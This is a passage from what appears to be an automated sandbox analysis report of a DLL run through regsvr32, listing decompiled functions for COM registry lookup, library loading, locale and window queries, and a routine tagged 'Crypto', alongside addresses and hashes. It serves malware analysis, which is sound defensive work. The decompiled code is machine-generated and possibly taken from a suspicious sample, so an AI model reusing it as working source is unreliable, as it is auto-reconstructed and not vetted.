                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                          • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 821125782-1075368562
                                                                        • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                        • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100348C4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E100348C4(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v284;
				intOrPtr _t10;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;

				_t22 = __esi;
				_t20 = __ecx;
				_t19 = __ebx;
				_t27 = _a8 - 0x800;
				_t10 =  *0x1004c470; // 0x303bb91f
				_v8 = _t10;
				if(_a8 != 0x800) {
					__eflags = GetLocaleInfoA(_a8, 3,  &_a8, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					lstrcpyA( &_a8, "LOC");
					L2:
					_push(_t22);
					_t15 = E10011D44(_t19, _t20, _t27,  &_v284, 0x112, _a4,  &_a8);
					if(_t15 == 0xffffffff || _t15 >= 0x112) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
				}
				return E100117AE(_t12, _v8);
			}










                                                                        0x100348c4
                                                                        0x100348c4
                                                                        0x100348c4
                                                                        0x100348cd
                                                                        0x100348d4
                                                                        0x100348d9
                                                                        0x100348df
                                                                        0x10034930
                                                                        0x10034932
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034934
                                                                        0x100348e1
                                                                        0x100348e7
                                                                        0x100348ed
                                                                        0x100348ed
                                                                        0x10034902
                                                                        0x1003490d
                                                                        0x10034936
                                                                        0x10034936
                                                                        0x10034913
                                                                        0x1003491a
                                                                        0x1003491a
                                                                        0x10034938
                                                                        0x10034942

                                                                        APIs
                                                                        • lstrcpyA.KERNEL32(00000800,LOC), ref: 100348E7
                                                                        • LoadLibraryA.KERNEL32(?), ref: 1003491A
                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 1003492A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLibraryLoadLocalelstrcpy
                                                                        • String ID: LOC
                                                                        • API String ID: 864663389-519433814
                                                                        • Opcode ID: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction ID: 1b661f8c901bfcf78996fae171bebb1d1a637ee772a53719b66f99f2a01cec23
                                                                        • Opcode Fuzzy Hash: ad67d3c8016f57b00d0c078d706d5660c578af4637d4d2560efd47c21605650e
                                                                        • Instruction Fuzzy Hash: 6C018B3990111CAFEB62DFA0DC49EDE37ACEB00326F018562FA15DE190DB30EA448B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10007AE5 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E10007AE5(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E1000799F() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E10007A99( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1004edfc(_a4, _a8);
			}





                                                                        0x10007af2
                                                                        0x10007b06
                                                                        0x10007b1a
                                                                        0x10007b32
                                                                        0x10007b1c
                                                                        0x10007b23
                                                                        0x10007b23
                                                                        0x10007b3a
                                                                        0x00000000
                                                                        0x10007b3c
                                                                        0x00000000
                                                                        0x10007b43
                                                                        0x10007b3a
                                                                        0x00000000
                                                                        0x10007b08
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                        • Instruction ID: 3a21d875c7eeece48a0e685930edcd66bc13eb96913376d54ee1399e2fea6754
                                                                        • Opcode Fuzzy Hash: 83ae4de29b23ff51b0e8bec05b4b5c9f8fcd8e6cb892886513852504e8bddb0b
                                                                        • Instruction Fuzzy Hash: DFF0C935A04119ABEB02EF61CC49EAE7FA9FB042C4B408025FD1AD506ADB38DA559B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001090 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10001090() {
				char _v8;
				char _t12;
				intOrPtr* _t16;
				signed int _t18;

				_t18 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v8, 7) == 0) {
					L5:
					return GetACP();
				} else {
					_t12 = _v8;
					_t16 =  &_v8;
					if(_t12 == 0) {
						goto L5;
					} else {
						do {
							_t16 = _t16 + 1;
							_t18 = _t12 + (_t18 + _t18 * 4) * 2 - 0x30;
							_t12 =  *_t16;
						} while (_t12 != 0);
						if(_t18 != 0) {
							return _t18;
						} else {
							goto L5;
						}
					}
				}
			}







                                                                        0x10001094
                                                                        0x100010b1
                                                                        0x100010d5
                                                                        0x100010df
                                                                        0x100010b3
                                                                        0x100010b3
                                                                        0x100010b9
                                                                        0x100010bd
                                                                        0x00000000
                                                                        0x100010c0
                                                                        0x100010c0
                                                                        0x100010c6
                                                                        0x100010c7
                                                                        0x100010cb
                                                                        0x100010cd
                                                                        0x100010d3
                                                                        0x100010e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100010d3
                                                                        0x100010bd

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32 ref: 10001096
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 100010A9
                                                                        • GetACP.KERNEL32 ref: 100010D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID:
                                                                        • API String ID: 4232894706-0
                                                                        • Opcode ID: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                        • Instruction ID: 26a1fdc9c2cb66cfcd8947c1f0583feeb1697c74baf4304ef7dc7fad7aa6cfc5
                                                                        • Opcode Fuzzy Hash: e87460b6ede7ecce593e36227f27ce69e25290a2edb96822d484cbb01d0533fa
                                                                        • Instruction Fuzzy Hash: 3BF0E2366002B09AEE02DF61EC44ADB3BA4EF04BC1F814548EDC59B105E660AA0AC7E2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000DB7F Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E1000DB7F(signed int* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t240;
				intOrPtr* _t241;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t260;
				signed int _t263;
				signed int _t267;
				void* _t272;
				void* _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				void* _t304;
				intOrPtr* _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t319;
				signed int* _t320;
				intOrPtr _t342;
				signed int _t346;
				signed int _t359;
				signed int _t390;
				signed int _t392;
				signed int _t396;
				void* _t402;
				signed int _t405;
				signed int _t408;
				signed int _t410;
				signed int _t414;
				void* _t416;
				signed int _t418;
				signed int _t422;
				void* _t423;
				signed int _t427;
				signed int _t430;
				void* _t432;
				void* _t434;
				intOrPtr _t435;
				signed int _t439;

				E10011BF0(0x1003af23, _t432);
				_t435 = _t434 - 0x54;
				_t240 =  *0x1004c470; // 0x303bb91f
				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t320 = __ecx;
				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
				asm("movsd");
				 *((char*)(_t432 - 0x3d)) = 0;
				_t241 =  *((intOrPtr*)(_t432 + 8));
				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x10040644, _t432 - 0x3c, _t402, _t416, _t319);
				if(_t418 >= 0) {
					_t419 = __ecx + 0x14;
					__eflags =  *_t419;
					 *(_t432 - 0x2c) = 0;
					if( *_t419 != 0) {
						 *((char*)(__ecx + 0x1c)) = 1;
						goto L13;
					} else {
						 *(_t432 - 0x28) = 0;
						_t311 =  *((intOrPtr*)(_t432 + 8));
						 *(_t432 - 4) = 1;
						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x10040624, _t432 - 0x28);
						 *(_t432 - 0x38) = _t312;
						__eflags = _t312;
						_t313 =  *(_t432 - 0x28);
						if(_t312 >= 0) {
							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
							_t419 = _t314;
							__eflags = _t314;
							_t315 =  *(_t432 - 0x28);
							 *(_t432 - 4) = 0;
							if(_t314 >= 0) {
								__eflags = _t315;
								 *((char*)(__ecx + 0x1c)) = 0;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L13:
								 *(_t432 - 0x34) = 0;
								 *(_t432 - 4) = 2;
								 *(_t432 - 0x34) = E1001F77E(_t320[3] * 0x34);
								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
								__eflags =  *(_t432 - 0x34);
								if( *(_t432 - 0x34) != 0) {
									 *(_t432 - 4) = 4;
									_t320[4] = E1001F77E(_t320[3]);
									_t405 = 0;
									__eflags = _t320[4];
									 *(_t432 - 4) = 0;
									if(__eflags != 0) {
										 *(_t432 - 0x30) =  *(_t432 - 0x34);
										 *(_t432 - 0x38) = 0;
										while(1) {
											__eflags = _t405 - _t320[3];
											if(_t405 >= _t320[3]) {
												break;
											}
											 *((char*)(_t405 + _t320[4])) = 0;
											_t410 = _t405 + _t405 * 2 << 4;
											_t272 = _t320[5] + _t410;
											__eflags =  *(_t272 + 0x10) - _t320[9];
											if( *(_t272 + 0x10) <= _t320[9]) {
												L41:
												_t342 =  *((intOrPtr*)(_t272 + 0x14));
												__eflags = _t342 - 0xd;
												if(_t342 != 0xd) {
													__eflags = _t342 - 0x81;
													if(_t342 == 0x81) {
														_t156 = _t272 + 0x10;
														 *_t156 =  *(_t272 + 0x10) + 1;
														__eflags =  *_t156;
													}
													_t274 = _t320[5] + _t410;
													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
													if( *((short*)(_t274 + 0x14)) == 0x82) {
														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
													}
													_t276 = _t320[5] + _t410;
													__eflags = _t276;
													 *(_t432 - 0x28) = _t276;
													_t278 = E10009FD2( *(_t276 + 0x14) & 0x0000ffff);
													_push(0);
													goto L55;
												} else {
													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
													 *(_t432 - 4) = 8;
													 *(_t432 - 0x44) = E1001F77E(0x14);
													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
													__eflags =  *(_t432 - 0x44);
													if( *(_t432 - 0x44) != 0) {
														goto L49;
													} else {
														_t414 =  *(_t432 - 0x38);
														__eflags = _t414;
														if(__eflags > 0) {
															_t427 =  *(_t432 - 0x34) + 0x14;
															__eflags = _t427;
															do {
																_push( *_t427);
																L1001F7A9(_t320, _t414, _t427, __eflags);
																_t427 = _t427 + 0x34;
																_t414 = _t414 - 1;
																__eflags = _t414;
															} while (__eflags != 0);
														}
														goto L47;
													}
												}
											} else {
												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
												if( *((short*)(_t272 + 0x14)) == 0xd) {
													goto L41;
												} else {
													_t359 = _t320[8];
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														__eflags = _t359 - 1;
														if(_t359 != 1) {
															__eflags =  *((char*)(_t432 - 0x3d));
															if(__eflags == 0) {
																_t419 = 0;
																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
																 *(_t432 - 0x50) = 0;
																 *(_t432 - 0x4c) = 0;
																E1000DAA7(_t320, _t410, 0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
																__eflags =  *(_t432 - 0x50);
																if( *(_t432 - 0x50) == 0) {
																	__eflags =  *(_t432 - 0x4c);
																	if( *(_t432 - 0x4c) != 0) {
																		_t419 = 0x1004079c;
																		goto L32;
																	}
																} else {
																	_t419 = 0x100407ac;
																	L32:
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																}
																 *((char*)(_t432 - 0x3d)) = 1;
															}
															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
															 *(_t432 - 4) = 6;
															 *(_t432 - 0x44) = E1001F77E(0x14);
															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
															__eflags =  *(_t432 - 0x44);
															if( *(_t432 - 0x44) != 0) {
																L49:
																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
																 *(_t432 - 0x28) = _t320[5] + _t410;
																_t278 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
																_push( *(_t432 - 0x44));
																L55:
																_t169 =  *(_t432 - 0x2c) - 1; // -1
																_t419 = _t278 + _t169 &  !(_t278 - 1);
																_t281 =  *(_t432 - 0x28);
																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
																_t390 = _t346 + 0x00000007 & 0xfffffffc;
																_push(_t390);
																_push(_t346);
																_push(_t419);
																_push(0);
																 *(_t432 - 0x2c) = _t390;
																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
																 *(_t432 - 0x28) = _t390;
																_push(0);
																_push(0);
																_push( *((intOrPtr*)(_t281 + 0x10)));
																__eflags = 0;
																_push(0);
																_push( *((intOrPtr*)(_t281 + 8)));
																_push( *(_t432 - 0x30));
																E10009E21();
																_t435 = _t435 + 0x30;
																goto L56;
															} else {
																_t414 =  *(_t432 - 0x38);
																__eflags = _t414;
																if(__eflags > 0) {
																	_t430 =  *(_t432 - 0x34) + 0x14;
																	__eflags = _t430;
																	do {
																		_push( *_t430);
																		L1001F7A9(_t320, _t414, _t430, __eflags);
																		_t430 = _t430 + 0x34;
																		_t414 = _t414 - 1;
																		__eflags = _t414;
																	} while (__eflags != 0);
																}
																L47:
																_push( *(_t432 - 0x34));
																L1001F7A9(_t320, _t414, _t419, __eflags);
																_push(_t320[4]);
																L1001F7A9(_t320, _t414, _t419, __eflags);
																_t320[4] = _t320[4] & 0x00000000;
																goto L15;
															}
														} else {
															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
															 *(_t432 - 0x28) = _t320[5] + _t410;
															_t304 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
															_t90 =  *(_t432 - 0x2c) - 1; // -1
															_t419 = _t304 + _t90 &  !(_t304 - 1);
															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
															 *(_t432 - 0x28) = _t392;
															 *(_t432 - 0x2c) = _t392 + 4;
															E10009F01( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
															_t435 = _t435 + 0x38;
															goto L56;
														}
													} else {
														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
														_t396 = _t67 & 0xfffffffc;
														 *(_t432 - 0x28) = _t396;
														 *(_t432 - 0x2c) = _t396 + 4;
														_t419 = 0;
														E10009F01( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
														_t435 = _t435 + 0x34;
														L56:
														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
														 *(_t320[5] + _t410 + 4) = _t419;
														_t405 =  *(_t432 - 0x38);
														continue;
													}
												}
											}
											goto L85;
										}
										__eflags =  *_t320;
										if( *_t320 != 0) {
											L67:
											_t320[2] = _t320[2] & 0x00000000;
											 *(_t432 - 4) = 0xa;
											_t320[2] = E1001F77E( *(_t432 - 0x2c));
											_t249 = _t320[2];
											_t405 = 0;
											__eflags = _t249;
											 *(_t432 - 4) = 0;
											if(_t249 != 0) {
												E10011C50(_t249, 0,  *(_t432 - 0x2c));
												_t418 = E10009DD7( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
												__eflags = _t418;
												if(__eflags < 0) {
													_push(_t320[4]);
													L1001F7A9(_t320, 0, _t418, __eflags);
													_t320[4] = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t418, __eflags);
												goto L81;
											} else {
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t422 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t422;
													do {
														_push( *_t422);
														L1001F7A9(_t320, _t405, _t422, __eflags);
														_t405 = _t405 + 1;
														_t422 = _t422 + 0x34;
														__eflags = _t405 - _t320[3];
													} while (__eflags < 0);
													_t405 = 0;
													__eflags = 0;
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t419, __eflags);
												_push(_t320[4]);
												L1001F7A9(_t320, _t405, _t419, __eflags);
												_t320[4] = _t405;
												goto L74;
											}
										} else {
											_push(1);
											_t263 = E10009D73(_t320);
											__eflags = _t263;
											 *(_t432 - 0x38) = _t263;
											if(_t263 >= 0) {
												 *((char*)( *_t320 + 4)) = 1;
												goto L67;
											} else {
												_t423 = 0;
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t408 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t408;
													do {
														_push( *_t408);
														L1001F7A9(_t320, _t408, _t423, __eflags);
														_t423 = _t423 + 1;
														_t408 = _t408 + 0x34;
														__eflags = _t423 - _t320[3];
													} while (__eflags < 0);
												}
												_push( *(_t432 - 0x34));
												L1001F7A9(_t320, _t405, _t423, __eflags);
												_push(_t320[4]);
												L1001F7A9(_t320, _t405, _t423, __eflags);
												_t267 =  *(_t432 - 0x3c);
												_t320[4] = _t320[4] & 0x00000000;
												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
												__eflags = _t267;
												goto L63;
											}
										}
									} else {
										_push( *(_t432 - 0x34));
										L1001F7A9(_t320, 0, _t419, __eflags);
										L74:
										_t260 =  *(_t432 - 0x3c);
										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
										__eflags = _t260 - _t405;
										goto L75;
									}
								} else {
									L15:
									_t260 =  *(_t432 - 0x3c);
									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
									__eflags = _t260;
									L75:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t260 + 8))(_t260);
									}
									_t254 = 0x8007000e;
								}
							} else {
								__eflags = _t315;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L81:
								_t253 =  *(_t432 - 0x3c);
								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
								__eflags = _t253 - _t405;
								goto L82;
							}
						} else {
							__eflags = _t313;
							 *(_t432 - 4) = 0;
							if(_t313 != 0) {
								 *((intOrPtr*)( *_t313 + 8))(_t313);
							}
							_t267 =  *(_t432 - 0x3c);
							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
							__eflags = _t267;
							L63:
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t267 + 8))(_t267);
							}
							_t254 =  *(_t432 - 0x38);
						}
					}
				} else {
					_t253 =  *(_t432 - 0x3c);
					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
					_t439 = _t253;
					L82:
					if(_t439 != 0) {
						 *((intOrPtr*)( *_t253 + 8))(_t253);
					}
					_t254 = _t418;
				}
				L85:
				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
				return E100117AE(_t254,  *((intOrPtr*)(_t432 - 0x14)));
			}
















































                                                                        0x1000db84
                                                                        0x1000db89
                                                                        0x1000db8c
                                                                        0x1000db91
                                                                        0x1000dba0
                                                                        0x1000dba1
                                                                        0x1000dba2
                                                                        0x1000dba3
                                                                        0x1000dba5
                                                                        0x1000dba8
                                                                        0x1000dbab
                                                                        0x1000dbae
                                                                        0x1000dbaf
                                                                        0x1000dbb3
                                                                        0x1000dbb8
                                                                        0x1000dbc8
                                                                        0x1000dbcc
                                                                        0x1000dbde
                                                                        0x1000dbe1
                                                                        0x1000dbe3
                                                                        0x1000dbe6
                                                                        0x1000dc65
                                                                        0x00000000
                                                                        0x1000dbe8
                                                                        0x1000dbe8
                                                                        0x1000dbeb
                                                                        0x1000dbfa
                                                                        0x1000dbfe
                                                                        0x1000dc00
                                                                        0x1000dc03
                                                                        0x1000dc05
                                                                        0x1000dc08
                                                                        0x1000dc32
                                                                        0x1000dc35
                                                                        0x1000dc37
                                                                        0x1000dc39
                                                                        0x1000dc3c
                                                                        0x1000dc40
                                                                        0x1000dc55
                                                                        0x1000dc57
                                                                        0x1000dc5b
                                                                        0x1000dc60
                                                                        0x1000dc60
                                                                        0x1000dc69
                                                                        0x1000dc70
                                                                        0x1000dc73
                                                                        0x1000dc7d
                                                                        0x1000dc93
                                                                        0x1000dc97
                                                                        0x1000dc9b
                                                                        0x1000dcae
                                                                        0x1000dcb8
                                                                        0x1000dcce
                                                                        0x1000dcd0
                                                                        0x1000dcd3
                                                                        0x1000dcd6
                                                                        0x1000dce8
                                                                        0x1000dceb
                                                                        0x1000dcee
                                                                        0x1000dcee
                                                                        0x1000dcf1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000dcfa
                                                                        0x1000dd04
                                                                        0x1000dd07
                                                                        0x1000dd0c
                                                                        0x1000dd0f
                                                                        0x1000deaa
                                                                        0x1000deaa
                                                                        0x1000deae
                                                                        0x1000deb2
                                                                        0x1000df65
                                                                        0x1000df6a
                                                                        0x1000df6c
                                                                        0x1000df6c
                                                                        0x1000df6c
                                                                        0x1000df6c
                                                                        0x1000df72
                                                                        0x1000df74
                                                                        0x1000df7a
                                                                        0x1000df83
                                                                        0x1000df83
                                                                        0x1000df89
                                                                        0x1000df89
                                                                        0x1000df8b
                                                                        0x1000df93
                                                                        0x1000df98
                                                                        0x00000000
                                                                        0x1000deb8
                                                                        0x1000deb8
                                                                        0x1000debe
                                                                        0x1000dec8
                                                                        0x1000dede
                                                                        0x1000dee2
                                                                        0x1000dee6
                                                                        0x00000000
                                                                        0x1000dee8
                                                                        0x1000dee8
                                                                        0x1000deeb
                                                                        0x1000deed
                                                                        0x1000def2
                                                                        0x1000def2
                                                                        0x1000def5
                                                                        0x1000def5
                                                                        0x1000def7
                                                                        0x1000defc
                                                                        0x1000deff
                                                                        0x1000deff
                                                                        0x1000df00
                                                                        0x1000def5
                                                                        0x00000000
                                                                        0x1000deed
                                                                        0x1000dee6
                                                                        0x1000dd15
                                                                        0x1000dd15
                                                                        0x1000dd1a
                                                                        0x00000000
                                                                        0x1000dd20
                                                                        0x1000dd20
                                                                        0x1000dd23
                                                                        0x1000dd26
                                                                        0x1000dd77
                                                                        0x1000dd7a
                                                                        0x1000de07
                                                                        0x1000de0b
                                                                        0x1000de1a
                                                                        0x1000de1e
                                                                        0x1000de25
                                                                        0x1000de2c
                                                                        0x1000de2f
                                                                        0x1000de32
                                                                        0x1000de37
                                                                        0x1000de3a
                                                                        0x1000de43
                                                                        0x1000de46
                                                                        0x1000de48
                                                                        0x00000000
                                                                        0x1000de48
                                                                        0x1000de3c
                                                                        0x1000de3c
                                                                        0x1000de4d
